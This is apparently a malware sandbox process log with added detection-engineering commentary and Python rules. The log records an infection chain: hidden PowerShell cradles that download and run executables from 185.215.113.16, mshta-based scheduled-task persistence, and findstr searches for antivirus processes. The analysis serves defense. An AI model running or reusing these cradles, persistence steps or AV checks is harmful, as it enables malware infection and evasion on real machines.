Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe "C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe"
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "j1HKkma32Vn" /tr "mshta \"C:\Temp\v468GkyBl.hta\"" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\v468GkyBl.hta"
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE "C:\Temp\v468GkyBl.hta"
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe "C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn Z94szma4HiI /tr "mshta C:\Users\user\AppData\Local\Temp\wucgjnAiS.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\wucgjnAiS.hta
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn Z94szma4HiI /tr "mshta C:\Users\user\AppData\Local\Temp\wucgjnAiS.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Macromedia.com F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Process created: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe "C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe"
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\wucgjnAiS.hta
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe "C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE "C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE"
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js"
Source: unknown Process created: C:\ProgramData\jhbbvnx\fbpbh.exe C:\ProgramData\jhbbvnx\fbpbh.exe
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd" "
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd" any_word
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe "C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe"
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe Process created: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe "C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe"
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe Process created: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe "C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe"
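The process tree above is the whole infection chain in the open: schtasks registers a task that runs mshta on a dropped .hta every 25 minutes, the HTA spawns a hidden PowerShell that fetches a payload with WebClient.DownloadFile and starts it, a batch stage runs tasklist piped through findstr for security-product process names, fragments are glued together with copy /b into an AutoIt host (Macromedia.com) that then registers a wscript logon task with /RL HIGHEST. Note also the path bug visible in the report: the first HTA builds its drop path as $env:temp+'MHLZ…EXE' with no backslash, so the payload is written as C:\Users\user\AppData\Local\TempMHLZ…EXE beside the Temp folder rather than inside it, while the second HTA includes the separator and drops into Temp proper. The detection logic below runs those heuristics over process-creation events. It is an added example, not a Sigma rule from the report or Joe Sandbox code; the event shape, the rule names and the 0.x thresholds are assumptions, and the sample events are constructed from the command lines the report prints. The findstr arguments are process names of common consumer security products (AvastUI for Avast, AVGUI for AVG, bdservicehost for Bitdefender, nsWscSvc for Norton, ekrn for ESET, SophosHealth for Sophos, wrsa for Webroot, opssvc for Quick Heal).

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# findstr arguments taken from the report's batch stage, lower-cased for matching
AV_PROCESS_NAMES = {"opssvc", "wrsa", "avastui", "avgui", "bdservicehost",
                    "nswscsvc", "ekrn", "sophoshealth"}


@dataclass
class ProcEvent:  # minimal process-creation record (assumed shape, e.g. from Sysmon event 1)
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def match_rules(ev: ProcEvent) -> List[str]:
    """Return the name of every heuristic the event triggers (Sigma-style logic in plain Python)."""
    hits = []
    img, parent, low = _basename(ev.image), _basename(ev.parent_image), ev.command_line.lower()
    if img == "schtasks.exe" and "/create" in low and "mshta" in low:
        hits.append("schtasks_persistence_via_mshta")
    if img == "schtasks.exe" and "/create" in low and "wscript" in low and "/rl highest" in low:
        hits.append("schtasks_logon_task_wscript_highest")
    if parent == "mshta.exe" and img == "powershell.exe":
        hits.append("mshta_spawns_powershell")
    if (img == "powershell.exe"
            and re.search(r"downloadfile\(|downloadstring\(|invoke-webrequest|\biwr\b", low)
            and re.search(r"start-process|\biex\b|invoke-expression", low)):
        hits.append("powershell_download_and_execute")
    if img == "findstr.exe" and any(name in low for name in AV_PROCESS_NAMES):
        hits.append("av_process_discovery")
    if img == "cmd.exe" and re.search(r"copy\s+/b\s+\S+(\s*\+\s*\S+)+", low):
        hits.append("copy_b_fragment_concatenation")
    return hits


def extract_urls(command_line: str) -> List[str]:
    """Pull download URLs out of a command line for IOC extraction."""
    return re.findall(r"https?://[^\s'\"()]+", command_line)


def resolve_drop_path(command_line: str,
                      temp_dir: str = r"C:\Users\user\AppData\Local\Temp") -> Optional[str]:
    """Reproduce the HTA's $env:temp+'<literal>' string concatenation to predict where the payload
    is written. With no leading backslash in the literal the file lands next to Temp, not inside it."""
    m = re.search(r"\$env:temp\+'([^']+)'", command_line, re.IGNORECASE)
    return temp_dir + m.group(1) if m else None


def triage(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Map event index -> rule names for every event that fired at least one rule."""
    return {i: hits for i, ev in enumerate(events) if (hits := match_rules(ev))}


# Constructed sample: parent/child pairs and command lines copied from the report's process tree.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\schtasks.exe",
              r'schtasks /create /tn mS3R9maupm1 /tr "mshta C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta" /sc minute /mo 25 /ru "user" /f'),
    ProcEvent(r"C:\Windows\SysWOW64\mshta.exe", r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;'''),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\findstr.exe",
              r'findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"'),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r"cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com"),
    ProcEvent(r"C:\Users\user\AppData\Local\Temp\764661\Macromedia.com", r"C:\Windows\SysWOW64\schtasks.exe",
              r"""schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST"""),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\timeout.exe", "timeout /t 2"),
]

if __name__ == "__main__":
    for idx, rules in triage(SAMPLE_EVENTS).items():
        ev = SAMPLE_EVENTS[idx]
        print(f"[{', '.join(rules)}] {ev.command_line[:90]}")
        for url in extract_urls(ev.command_line):
            print("   url:", url, "-> drops", resolve_drop_path(ev.command_line))
```

When hunting on real telemetry, the mshta-to-powershell parent/child pair and the DownloadFile/Start-Process combination are the highest-signal rules; the findstr rule is noisy on its own but, as here, it normally appears as a child of a cmd.exe that also ran tasklist. The drop-path helper is a reminder that file-based IOCs must follow what the dropper actually does, not what its author intended.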
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe "C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe "C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd" "
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe "C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe "C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe "C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Process created: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe "C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe"
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn mS3R9maupm1 /tr "mshta C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn mS3R9maupm1 /tr "mshta C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE "C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd" any_word
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "j1HKkma32Vn" /tr "mshta \"C:\Temp\v468GkyBl.hta\"" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\v468GkyBl.hta"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Macromedia.com F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn Z94szma4HiI /tr "mshta C:\Users\user\AppData\Local\Temp\wucgjnAiS.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\wucgjnAiS.hta
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn Z94szma4HiI /tr "mshta C:\Users\user\AppData\Local\Temp\wucgjnAiS.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE "C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE"
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe Process created: unknown unknown
Source: C:\Windows\System32\wscript.exe Process created: unknown unknown
Source: C:\ProgramData\jhbbvnx\fbpbh.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd" any_word
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe Process created: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe "C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe"
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe Process created: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe "C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe"
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe Process created: unknown unknown
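The process chain above carries four behaviours that a detection engineer would want rules for: mshta.exe spawning a hidden PowerShell that downloads and starts a file from 185.215.113.16, schtasks creating a task that re-runs an .hta every 25 minutes (and an onlogon task running AchillesGuard.js through wscript with /RL HIGHEST), tasklist piped into findstr to look for security-product processes, and copy /b stitching Macromedia.com together from innocuously named fragments. The Python below is an added example and is not part of this Joe Sandbox report or its tooling: it hand-transcribes a handful of the Process created lines above into constructed events and runs simple rules over them. The AV process names are exactly the ones the sample's own findstr calls search for; the list of script hosts, the regular expressions and the rule names are this example's assumptions. It also replays the $env:temp+'...' string concatenation used by the cradles, which is why two of them land at C:\Users\user\AppData\Local\TempMHLZ... and TempOBIIERT... (PowerShell inserts no separator, so the file is written beside Temp, not inside it) while the /mine/ cradle, whose literal starts with a backslash, lands inside Temp.

```python
"""Detection rules over the process-creation chain in this report.

Added example, not Joe Sandbox code or output: each event is (parent image,
child image, command line), hand-transcribed from a few of the "Process
created" lines above. A real pipeline would read Sysmon event ID 1 instead.
"""
from __future__ import annotations
import re
from typing import NamedTuple


class ProcEvent(NamedTuple):
    parent: str
    image: str
    cmdline: str


MSHTA, PS = r"C:\Windows\SysWOW64\mshta.exe", r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
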